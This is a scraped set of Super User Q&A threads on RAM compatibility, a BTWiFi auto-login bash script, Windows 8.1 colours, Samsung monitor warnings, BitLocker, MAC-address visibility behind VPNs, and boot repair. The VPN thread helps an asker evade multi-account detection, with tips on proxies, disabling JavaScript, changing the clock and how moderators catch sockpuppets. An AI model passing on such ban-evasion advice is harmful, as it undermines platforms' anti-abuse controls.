wrong and your PC won't boot) The well known ones are Buffering and ECC. Servers tend to have both, laptops tend to have neither.In both cases, you either have it or you don't. If you don't it's easy, but if you do have it, then you have to pay attention to what kind of buffering or ECC is going on.Buffering comes in 2 kinds: Regular or Registered and LR or Load Reduced. (NOT to be confused with Low voltage) Regular is best when you want fast memory, LR is better when you want to put as much memory as possible on each CPU.The way ECC gets implemented depends on the number of bits on each physical memory chip. That is the "x-Value" that appears in 2Rx8, 2Rx4, 2Rx4, etc. The memory controller can handle either one, but they have to match. x4 is slightly preferred because it can correct for more types of errors, but it is not any faster. (in practice, all we really use is error detection. Memory is very reliable, but if it starts dropping bits, you replace it ASAP, rather than relying on flamboyant error correction algos)Then there is the matter of Rank (also called "high" vs "Low" density or Single vs Double sided). Think of a stick with 2 Ranks as having 2 logical sticks of 1/2 the size mounted on one physical stick. Higher rank allows more interleaving, and higher capacity modules, but it adds overhead. Generally 2R is the fastest. 4 or 8R will show up on big LR type modules.Finally there are issues that I call "perfromance compatability". Mess those up and your computer will still boot, but it might run slower or hotter than if you get it right.These are chiefly speed and voltage levels. Low voltage chips will typically work at the standard voltage, but you can't use standard chips in a system that is set up for low voltage. (secretly the voltage is adjustable on many mother boards, either by you or automagically by the BIOS)Speed is more accurately thought of as Speed Limit, or best case speed. If you mix modules with different speeds, the system will operate at the lower speed. But speed also depends on which modules you put where. Putting multiple modules on the same channel is very likely to result in the system deciding to lower the clock speed.Loading is not a big deal on a laptop with only 2 slots, but on a big server that has 2 CPUs, 4 memory channels per CPU and up to 3 Banks per channel, it can affect the speed a great deal. (We are talking factors of 5x or more, just by rearranging how the sticks are loaded into the slots)The right way to load them is to load the channels evenly, with identical modules in each bank and compatible modules across banks.A lot of the documentation is terrible, but the rules tend to follow the CPU around. I found this Fujitsu paper that explained my Dell Server (using the same Xeon CPUs) much better than the Dell documents did!https://sp.ts.fujitsu.com/dmsp/Publications/public/wp-ivy-bridge-ep-memory-performance-ww-en.pdfIt's actually kind of interesting, if you are the sort of person who likes walking on broken glass or removing band-aids slowly.... :-)I haven't even mentioned "CAS Latency" which is another performance variable. Think of clock speed as how fast your legs move when you are running. Then latency is how long it takes you to get out of your chair and take the first step, after being told to start running.You can get all the gory details here, if you are in to that sort of thing....https://www.hardwaresecrets.com/understanding-ram-timings/#:~:text=CAS%20Latency%20(CL)%20Impact%20on%20RAM%20Speed&text=A%20memory%20with%20CL%20%3D%207,lowest%20CL%20will%20be%20faster.ShareImprove this answer Follow answered Jun 17, 2020 at 20:28Trubo-nerdTrubo-nerd1111 bronze badgeAdd a comment | ; 0 Samsung PC3-10600U is the main objective.. Make sure the RAM you are buying says PC3-10600U then look up your model number of your machine.. for example ..Dell has a express service tag that helps you find a owners manual .pdf on their website, use it to find out the max GB of RAM your machine is compatible with and go from their.. Windows 10 runs best with at least 4 GB but will run with 2 GB just often very slowly and if you can't get it past 2 GB then nothing you do will help you speed it up.. Parts numbers just tell you what week and year the chips are made.. Which is almost irrelevant unless you are buying RAM second hand. (9-10-A0) is the timing.. Generally the lower the numbers the less amount of clock cycles the faster chip.. But only relevant to motherboards that allow you to adjust the timings, most of the motherboards adjust them automatically.ShareImprove this answer Follow answered Sep 17, 2020 at 5:28ThriftyThrifty1Add a comment | ; 0 There is a product selector on the samsung websitehttps://www.samsung.com/semiconductor/dram/module/Once you find your module, and you click the link, you'll end up on a page like:https://www.samsung.com/semiconductor/dram/module/M393A2K40CB1-CRC/Notice that the URL contains the code of the memory module,and in fact, in some cases you can find slightly outdated modules just by modifying the path a little: e.g.https://www.samsung.com/semiconductor/dram/module/M393A2K40BB1-CRC/ShareImprove this answer Follow answered Jan 2, 2022 at 15:27bvdbbvdb15188 bronze badgesAdd a comment | 
How do I connect to my home's primary wired network through an extra (wireless) router?
networking;router;home-networking;networking;router;home-networking
How do I connect to my home's primary wired network through an extra (wireless) router? Ask Question
Automate BTWiFi login using a FON account
wireless-networking;script;hotspot;auto-login;wireless-networking;script;hotspot;auto-login
Automate BTWiFi login using a FON account Ask Question
2 Save this as a scrip and have it run every 10 mins. Dont forget to add your username and password at the top!#!/bin/bash# CONFDBG=trueRELOG_UNAME=usernamehereRELOG_PASSW=passwordhere# END CONFIS_LOGGED_IN=$(wget "https://www.btopenzone.com:8443/home" --timeout 30 -O - 2>/dev/null | grep "accountLogoff")if [ "$IS_LOGGED_IN" ]then [[ $DBG ]] && echo "currently logged in. Nothing to do.."else [[ $DBG ]] && echo "It's not logged in.. Will log in!" OUT=$(wget -qO- --post-data "USERNAME=$RELOG_UNAME&PASSWORD=$RELOG_PASSW" "https://btwifi.portal.fon.com/remote?res=hsp-login&HSPNAME=FonBT%3AGB&WISPURL=https%3A%2F%2Fwww.btopenzone.com%3A8443%2FfonLogon&WISPURLHOME=https%3A%2F%2Fwww.btopenzone.com%3A8443&VNPNAME=FonBT%3AGB&LOCATIONNAME=FonBT%3AGB") ONLINE=$(echo $OUT | grep youre_online ) if [ "$ONLINE" ] then [[ $DBG ]] && echo "You're online!" else [[ $DBG ]] && echo "Could not login :(" fifiShareImprove this answer Follow edited Aug 16, 2015 at 15:33 answered Aug 15, 2015 at 11:25MrBeanzyMrBeanzy12144 bronze badges91Thanks for this answer, but an explanation would be nice :-) – bertiebAug 15, 2015 at 13:204Well, this is awkward. You did not write the code you pasted, and I'm certain because I wrote it myself one year ago, a few days after posting my question. gist.github.com/sscarduzio/05ed0b41d6234530d724 – sscarduzioAug 17, 2015 at 13:281You can do it yourself, I used chrome "inspect element" -> select network tab, look at the HTTP requests, right click and copy curl command. Then I adapted curl to wget because I didn't have curl installed in my embedded device. – sscarduzioFeb 18, 2016 at 10:041@sscarduzio I've found the solution for Vodafone. The problem was that at each new connection it issues a challenge number, which is never the same. If you (or anyone else) are interested you can find it in here: superuser.com/questions/1053990/… Thanks for your help! – Michele Dall'AgataApr 7, 2016 at 10:291yeah, that's what has been the pain indeed. But after few runs with Chrome as you suggested it became clearer what was going on with the challenge number. Then the captive network assistant blocking the DNS queries just added damage to injury. No wonder I was stuck. But today I took my time and it eventually came out! Although I must say that having a script killing that annoying splash window just feels gooood. >:) – Michele Dall'AgataApr 7, 2016 at 21:17 | Show 4 more comments
VMware workstation 10.0.3 bridge network not working
networking;vmware-workstation;bridge;bridging;networking;vmware-workstation;bridge;bridging
VMware workstation 10.0.3 bridge network not working Ask Question
How do I change the Windows 8.1 background color?
windows;windows-8.1;windows;windows-8.1
How do I change the Windows 8.1 background color? Ask Question
4 Press Win+W and type accent in the Search box on the right, and select Change the Background and colors on Start. Click on it and change the color.Alternative method:Press Win while viewing the Desktop and you will be taken to the Metro Menu. Press Win+C → Settings → Personalize → Choose your color.ShareImprove this answer Follow edited Oct 7, 2014 at 18:51Samir20.1k7373 gold badges165165 silver badges225225 bronze badges answered Aug 24, 2014 at 21:47DevidDevid6,2391313 gold badges5555 silver badges7373 bronze badges5Nothing happens when I do that. I click it and it does nothing. – ECMAScriptAug 24, 2014 at 22:09@ECMAScript What do you mean ? When you click on Change the Background nothing happens ? – DevidAug 24, 2014 at 22:12I click on Change the Background and colors on Start and nothing appears – ECMAScriptAug 24, 2014 at 22:14@ECMAScript check the my answer I updated it. But you should actually see colors from which you can choose when you click on Background and colors on Start. – DevidAug 24, 2014 at 22:20I don't know about you, but clicking on the "Change the background and colors on Start" link is not resulting in any action, i.e. no settings window is shown. This is most likely a bug. I am using Windows 8.1 Pro with Update 1 and latest update, 64-bit version. – SamirOct 7, 2014 at 18:38Add a comment | ; 1 This is a variation of the method posted by Devid. On my Windows 8.1 Pro computer I was unable to click on the "Change the background and colors on Start" link, as noted. This is high likely a bug. So I will show a slightly different way to access this setting, and also post some nice screenshot.While viewing the Desktop, press the Windows key to show the Startscreen.Move your mouse pointer to the upper right corner of the screen andmove it down.Click on "Settings", and then "Personalize" at the top.Pick a "background color".ShareImprove this answer Follow edited Oct 7, 2014 at 18:52 answered Oct 7, 2014 at 18:46SamirSamir20.1k7373 gold badges165165 silver badges225225 bronze badgesAdd a comment | ; 0 Take your mouse p[ointer to the extreme right. Click Settings. Click Change PC Settings.Click PC and Devices on the PC Settings app.Choose the image you like, and exit.If you want to use your image to set as lock screen background, hit Browse button below lock screen images.ShareImprove this answer Follow answered Jan 17, 2015 at 8:13user31225user312251122 bronze badgesAdd a comment | 
HDMI connected Samsung Monitor says "Not Optimum Mode, Recommended Mode 1920x1080 60 hz"
display;display
HDMI connected Samsung Monitor says "Not Optimum Mode, Recommended Mode 1920x1080 60 hz" Ask Question
1 I have 5 Syncmaster monitors and I have found this issue very troubling with 3 out of 5. I found some partial solutions and or workarounds. The workaround solution of hitting the Menu or OCR button on the side or bottom right of the monitor for an instant, shuts the Optimum Resolution message off until the next time you turn it on. This is an issue with all the Syncmaster models newer than b2030. Syncmaster 2033 has the problem when using a DVI to VGA adapter on the PC and a VGA cable from adapter to monitor, occurring every time you turn monitor on or bring it out of sleep regardless of what the resolution is set at. With a DVI to DVI or VGA to VGA it only reports Optimum Resolution notice if you exceed the optimum resolution. The OS, GPU, or HDMI cable are not related to this, except for the HDMI cable which must be a special high speed designation for 4K display or will not do 2160p. Syncmaster b2030 only displays optimum resolution notice if you exceed the optimum resolution. This model works with all connector configurations, IE: DVI to DVI, VGA to VGA, HDMI to HDMI, And DVI to VGA Adapter and VGA from adapter to monitor. Syncmaster B1940 never displays the optimal resolution notice including when you exceed the max resolution of both the monitor and GPU by creating a custom resolution. I tried all the way to 1920 by 1080 successfully without Optimum resolution notice (monitor and GPU only can go to 1280 x 1024 max). I did notice variations in my DVI cables, even though they all had the same logo markings. One DVI had 3 rows of pins and a flat blade pin on one side. The second DVI cable had 2 sets of 3 rows with the middle 2 columns of pins missing and a flat blade pin on one side. The third DVI cable had 3 rows of pins with a flat blade pin on one side with 4 pins boxing in the flat blade pin. The fourth DVI connector was an antique with 4 rows of pins and no flat blade connector. Additionally, I seem to remember a DVI connector I had with 3 rows of pins and 2 flat blade pins at 90 degrees from each other. The problem seems to be due to how different Syncmaster monitors handle the slightly modified communication due to use of DVI to VGA adapter. Specifically, My DVI to VGA adapter has the 3 rows of pins with the one side blade pin boxed in by 4 pins. The DVI to DVI cables I have, are missing either the 4 pins that box the blade pin or they are missing the center 2 columns of pins and the 4 pins that box the blade pin. I tested the theory of a possible fix, that would only be available to a PC with a GPU control app like NVIDIA Control Panel or AMD Radeon software that allows creation of custom resolutions and especially Option to change scaling from application to GPU usually under the HDMI or Flat monitor options. Using AMD Radeon software I went into Home then select the settings gear icon and then select display and then disable GPU scaling. When I have GPU scaling on I get the Optimal Resolution notice right away and again every time I start the monitor or come out of sleep even if the resolution is correct. When I have GPU scaling off I only get the Optimal Resolution notice if I exceed the optimal resolution.Using Nvidia Control Panel You go to display and then set display size and position and then select Use the following settings select scaling and then select none for scaling mode and select desktop for scaling to stop the optimal resolution notice.ShareImprove this answer Follow edited Apr 30, 2020 at 5:56 answered Apr 30, 2020 at 4:45Carl SucroCarl Sucro1122 bronze badges11If a question is five minutes old (or even five hours), there’s some benefit to posting a partial answer quickly and then coming back to improve it.   But, when a question is over five years old, it probably makes sense to do enough experimentation to be able to post an actual solution that you know to work (even if only for you) rather than hinting at a theoretical possible fix. – G-Man Says 'Reinstate Monica'Apr 30, 2020 at 5:34Add a comment | ; 0 Hit the MENU button, and scroll down to the second from the bottom. Hit SOURCE to select it, the hit the down button until the options become AV mode and HDMI Black Level. Go to AV mode and hit Source to select it. Now press up or down to change the setting to OFF. Exit the menu. As long as AV mode is off, the monitor will display perfectly. If the color looks strange, change HDMI Black Level to Normal instead of the default LOW as well.ShareImprove this answer Follow answered Mar 21, 2020 at 15:14StealthStealth1Add a comment | ; 0 I fixed it by using dual monitor on the non-Samsung computer: Display => choose Samsung monitor => Display adapter properties => List All Modes => choose the right resolution and Hertz that's the same as the recommended mode of the Samsung computer.ShareImprove this answer Follow edited Mar 21, 2020 at 16:07JW09141 answered Jun 19, 2017 at 15:15TodayboyTodayboy1111 bronze badgeAdd a comment | ; 0 The answer from Todayboy worked for me, however need to know that the issue was solved by switching to any resolution of 60HZ frequency, eventhough the message on the screen was asking for 1920x1080 which has no 60Hz resolution.SO >Advanced display settings>display adapter properties for Display2>"popup window" List All Models>1680x1050 60HertzShareImprove this answer Follow answered Aug 7, 2022 at 8:19THnxTHnx111Your answer could be improved with additional supporting information. Please edit to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers in the help center. – CommunityBot Aug 7, 2022 at 8:23Add a comment | ; -1 I have solved this problem in my way.Open Display Setting PanelSelect your displaySelect the recommended resolutionplug out and again plug in the display cableIts works for me. Try this out I think it will work for all 100%.ShareImprove this answer Follow answered Feb 10, 2021 at 5:22Anupam Hayat ShawonAnupam Hayat Shawon11The error is coming from the monitor, not Windows. And if you use any resolution other than the monitor's maximum, the monitor complains. – TomXP411Feb 1, 2022 at 2:36Add a comment | ; -3 Right click in the main window -> Select Graphics Options -> Select Balloon Notification -> Select Optimal Resolution Notification -> DisableShareImprove this answer Follow edited Feb 14, 2015 at 3:08studiohack♦13.4k1919 gold badges8585 silver badges118118 bronze badges answered Feb 14, 2015 at 2:55StokieStokie311 bronze badge53It's a notification in the monitor, not in the OS. Thanks still. – redFeb 15, 2015 at 12:19The instruction was for the monitor but may not work for all. A cheap and cheerful but irritating option is to press the menu button (top one on the right of the monitor) and the message goes away immediately. If you're using a VGA cable consider upgrading to a DVI or HDMI to DVI cable – StokieFeb 15, 2015 at 23:55HDMI cable is the source of the issue. I've sorted the problem out with a converter. – redFeb 20, 2015 at 12:47I wonder how somebody "right clicks" if the instructions are for the monitor... – T.J.L.Jan 17, 2020 at 18:23This looks like steps for Windows, not for the display. The problem is Samsung displays try to "mansplain" when you're not running optimal resolution. I may "solve" this issue by returning the monitor and getting another brand. – TomXP411Feb 1, 2022 at 2:39Add a comment | 
So does bitlocker requires me to use password for my computer?
bitlocker;bitlocker
So does bitlocker requires me to use password for my computer? Ask Question
2 By not requiring a user to login, you have effectively rendered Bitlocker virtually useless. You need to re-enable the login screen to make use of Bitlocker. Bitlocker will check the validity of the login and then allow access to the encryted disk. By auto logging in, the check will always pass.ShareImprove this answer Follow answered Aug 24, 2014 at 21:13KeltariKeltari69.3k2626 gold badges171171 silver badges220220 bronze badges2Ah I see. Okay. Will login. – user4951Aug 25, 2014 at 0:23Actually it depends on the key protectors of your Bitlocker VMK, which is the key that is used to decrypt the FVEK. When you're at the login screen, Bitlocker already unlocked the encryption of the system in most cases, but it depends on the key protector you're using. – TarantulaOct 28, 2014 at 12:24Add a comment | 
Why is my metro screen getting extended to half of the second screen?
windows-8;multiple-monitors;microsoft-surface-pro;windows-8;multiple-monitors;microsoft-surface-pro
Why is my metro screen getting extended to half of the second screen? Ask Question
1 One possible problem may be that there is an issue with your drivers. I have had something like this happen before, where I was forced to update my monitor drivers for it to work. Try Dell Monitor Drivers and search for the appropriate one and install it. Hope it works!ShareImprove this answer Follow answered Jun 18, 2015 at 23:53UsernameUsername17111 silver badge1717 bronze badgesAdd a comment | 
Can a website see/know my MAC address even if I use a VPN? [duplicate]
vpn;browser;ip;fingerprint;vpn;browser;ip;fingerprint
Can a website see/know my MAC address even if I use a VPN? [duplicate] Ask Question
15 The only web sites that can access MAC addresses, are sites that have you download a software component to interface with them, which allow the site to circumvent the usual rules. So you technically have to give permission first by doing that. ActiveX & WMI (Windows Interface via Windows Management Instrumentation) for Internet Explorer and Java are methods used that could pass on a MAC address. ActiveX requires WMI is installed for this to work.Here is a script using WMI that reads MAC addresses: http://www.qualitycodes.com/tutorial.php?articleid=19&title=MAC-Address-Using-WMI-on-Internet-Explorer [NOTE: this link is now dead, but the script previously hosted at that location did the job for WMI enabled Windows-based computers so still needed as information for this question.]Here is a question with code to do this in Java on StackOverflow: https://stackoverflow.com/questions/10962072/get-mac-address-in-java-using-gethardwareaddress-non-deterministicAs mentioned in the comment below by Hennes, MAC addresses are internal only. Web servers do not generally pass on that information... just the IP addresses, and even then- users often only show the IP address of their location. If you are going to a web site for example, in a coffee shop, the IP shown is that of the coffee shop, not a user on the network.Regarding IP addresses-- JavaScript can use WebRTC (these examples for newer versions of Chrome and Firefox) now to show internal IP addresses as explained in this article: https://hacking.ventures/local-ip-discovery-with-html5-webrtc-security-and-privacy-risk/ See live working examples here: http://net.ipcalf.com/ and one that attepts to detect all ip addresses in your local range here: https://dl.dropboxusercontent.com/u/1878671/enumhosts.html This is not to be confused with MAC address data. If your JavaScript is turned off this will not work of course.Since it was mentioned in the question, JavaScript reads the time from the clock on your system. When you post from one page to another in a form, it could post the time from javascript, giving away the time zone you are in. Applications that use real-time like online bid applications do that. If that is different than the time the server sees that would be a 'flag' so to speak. The solution is to kill JavaScript or change your clock time. By itself it doesn't give much out though. Not everyone has their clock set properly but most have them auto-sync with real timeservers especially mobiles.In the comments below, specializt mentioned that WMI can be disabled. So can ActiveX, JavaScript, and Java which can simply be uninstalled.The cookies by themselves get server time, not the time from the web browser. If you want client-side time, the JavaScript method I mentioned above is a way to do it.If you are looking at a site, and two web browsers come up from the same ip (which yours would if you did not use proxies)-- it would not be necessary to check a cookie to know they came from the same location. The IP log tells them that. They cannot know it was from the same computer in the 'lab', but it may be guessed because they are in the same time slot in the web log. That may not help - one person or a person with an accomplice... it could be seen in that light.Proxies and VPNs would resolve the server log IP problem of course. Both browsers using a different proxy location like you mentioned is great.ShareImprove this answer Follow edited Mar 25, 2021 at 18:44 answered Aug 24, 2014 at 21:46Jeff ClaytonJeff Clayton1,08888 silver badges2727 bronze badges5Firstly, thanks for your answers Jeff and Hennes. They are the bests I saw so far. @Hennes, I heard that the MAC of computer cant go out of router, but still the router's MAC address information is going to the ISP and then to the website etc. sure? I mean, they can not see my computer's MAC but still they can identify me by seeing the same MAC of the same router I think, am I wrong? In addition to all, what ways can a website reach to prove that two accounts belong to the same person else than IP, browser information (language, screen res etc.) and MAC? Am I anonymized and safe? – ilhanAug 24, 2014 at 21:57Most welcome, I have installed wi-fi routers at more than one coffee shop, hence the example ;) – Jeff ClaytonAug 24, 2014 at 21:58Web sites can't see your MAC without you installing more software as I mentioned. The machine directly behind the router generally has its MAC address cloned by the router, but still not readable by the web server showing you a web site. – Jeff ClaytonAug 24, 2014 at 22:03You are technically safe in a crowd so to speak. If you go to a public wi-fi, with a large number of people using that location's shared ip, then someone would have to be actively looking for you, while you are there, in order to find you. If you have a dedicated ip, then you are registered with your ISP. Someone would have to contact your ISP and ask them for your credentials based on the ip that visited their web site. – Jeff ClaytonAug 24, 2014 at 22:111True, unless one is using IPv6 and has not configured privacy addressing. See (my) How to avoid exposing my MAC address when using IPv6? – ArjanOct 18, 2015 at 12:26Add a comment | ; 6 The others have already answered you main technical questions and my comment to some of them answer your doubts about MAC address. So I'll just concentrate on this:And lastly,Is there an extra way to be anonymized that I can do? For example, can my system clock or anything else give an information?Yes, there is one more thing that can trip you up: your personality. What you're trying to do is called sockpuppeting. You may have noticed that some sites like Stackoverflow and Reddit have moderators. They're the last-line defence against sock puppets. And in my personal experience is that they base their detection primarily on "hunch".Once they have a hunch that something is fishy they'll usually dig your posting history and find phrases or political views or mispellings or any pattern that's consistent. That is how sock puppet detection is done once you get past auto-detectors like referrer detection or IP address detection or username similarity detection (it's amazing how some people insist on using discoverable patterns when choosing usernames) etc.Against another human it's quite hard to avoid detection unless your second account does not do anything at all that's related to your first account. Then again, that generally defeats the purpose of sock puppets.ShareImprove this answer Follow edited Jun 12, 2020 at 13:48CommunityBot1 answered Aug 25, 2014 at 4:37slebetmanslebetman64244 silver badges99 bronze badges1Excellent description. Years ago a person I knew on the net found a web site of mine with a different name because it SEEMED like my regular site. It was rather impressive that he could do this. – Jeff ClaytonAug 25, 2014 at 19:45Add a comment | ; 5 Websites can't see your MAC address at all, so you don't need to use a VPN.ShareImprove this answer Follow answered Aug 24, 2014 at 20:10Alex DumitruAlex Dumitru21322 silver badges1010 bronze badges10I know services that can ban by MAC, so I wouldn't be so sure – TetsujinAug 24, 2014 at 20:35Thanks for answer Alex. But I know some websites that can detect multi accounts with different IPs. That's why I asked that if there are another ways for them to detect me. – ilhanAug 24, 2014 at 21:30If so, they're using some method other than your MAC address. – user89623Aug 24, 2014 at 23:064@Tetsujin: That's not a website, though, it's a game running directly on your computer. Web servers can't see your MAC address, but software installed and running on your computer definitely can. – Ben VoigtAug 25, 2014 at 6:231True, unless one is using IPv6 and has not configured privacy addressing. See (my) How to avoid exposing my MAC address when using IPv6? – ArjanOct 18, 2015 at 12:23 | Show 5 more comments; 2 A client's MAC address is used by the layer 2 protocol, eg ethernet, to uniquely identify each node on the local network. It is most likely that the web site that you are reaching is NOT on your local area network and hence will not see your MAC address.For sake of illustration lets say you have a PC on a LAN and you want to access a web site, eg google.com. First thing you need to do is find the best route to google.com. This will be via a router. most likely some sort of broadband router. If you are on ethernet, your networking systems places an ethernet frame round chunks of data in your request. In each frame there will be a to MAC address and a from MAC address. The to MAC address is the MAC address of your router and the from MAC address is your PC MAC.The router, when it receives the frame will strip off the frame and reframe it for the next leg of the journey. I don't know much about ADSL framing but there will still be a frame used - some sort of dsl type frame. This time the to MAC address will be the MAC of the next node on the route to google.com. The from MAC will be the MAC of the broadband side of your router.So you see, google.com will never see your PC's MAC address. It sees your IP address, sure, but not your MAC.ShareImprove this answer Follow answered Aug 24, 2014 at 23:33user619818user61981830633 gold badges44 silver badges1313 bronze badgesAdd a comment | ; 2 I think it's fairly obvious that software running within your computer can provide virtually any information needed to break your annonymity.So, it may be software accidentally installed.If it has access to the network later and the software layer, it can probably talk to itself to establish a connection through both networks and give your identity up.I believe that running two virtual machines is a slightly stronger method, although not perfect.There's very little chance of software within a virtual machine speaking to another virtual machine if you set it up right, however, of course software within the virtual machine may broadcast the MAC address to something that can be matched up.At the end of the day they may still match similar usernames, or other patterns, and there is little you can do about that.ShareImprove this answer Follow answered Oct 18, 2015 at 12:18GavinGavin2111 bronze badgeAdd a comment | ; 1 It depends on the web site you are accessing and what special scripts run on their servers.For example:When you connect to a wifi hotspot, you will first be directed to a login web page where you have to enter your credentials to be given farther access to the Internet. If you check the address bar of that login page, you will discover your MAC address in there and most likely the MAC address of the router you are connecting to. You don't need to have installed any special software on your computer. A script, which is downloaded by the browser from the server where the login web page is located, does that. That is, the script reads the information about your network adapter and creates the complex string placed in the browser address bar.After you login, the information about your MAC address sent by your computer and your credentials (user id and password) are placed in a database by the wifi hotspot provider. From that moment, on every time you connect to that wifi network (regardless of the physical hotpsot), your MAC address will be checked against the database. If the credentials are still current and valid you will be given access to the Internet, without the need of another login.Your MAC address and/or your credentials can be farther used by the wifi hotspot provider to monitor and limit your access to the network based on length of access, time of access, amount of data transferred, type of data accessed, etc.To answer the original question, a web site can read your MAC address, but they need to have special scripts on their servers and force your browser to download them.ShareImprove this answer Follow edited Jul 18, 2016 at 23:04Burgi6,4061414 gold badges4040 silver badges5252 bronze badges answered Jul 18, 2016 at 22:10user20001user200011111 bronze badgeAdd a comment | 
How to recover Windows Boot Manager after a Mint installation gone wrong
linux;linux-mint;windows;multi-boot;uefi;linux;linux-mint;windows;multi-boot;uefi
How to recover Windows Boot Manager after a Mint installation gone wrong Ask Question
2 try boot-repair-disk.It's a handy soft for this kind of issue.(there is an option to restore the mbr if you want to keep only windows 8).ShareImprove this answer Follow edited Jan 4, 2022 at 23:09 answered Sep 20, 2014 at 16:07user3531602user35316023622 bronze badges1Looks like you linked the French version – here is the English version. Since I no longer have the computer in front of me, I won't have a way to ever confirm this as the working solution or not, so I will mark your answer as accepted since this question is technically unanswerable otherwise. – J.W.F.Sep 21, 2014 at 23:42Add a comment | ; 0 is it possible to share the contents of your /boot/grub/grub.cfg file (the one that loads the OSes) from the terminal (with networking eth or wifi) run:Blockquote cat boot/grub/grub.cfg |pastebin This will output a http://paste.linuxmint.com/..... url can you share that here so we can hopefully help fix or modify it to get BOTH systems back up and fucntional~sent from my linux box (fedora 22)ShareImprove this answer Follow answered Apr 16, 2015 at 3:13linuxdev2013linuxdev20131,2521111 silver badges2121 bronze badges1Sadly, I am unable to provide more information as the issue was (sadly) resolved by a forced reinstallation of Windows by my cousin. Hopefully someone else can use this information later in the future. – J.W.F.Apr 16, 2015 at 21:23Add a comment |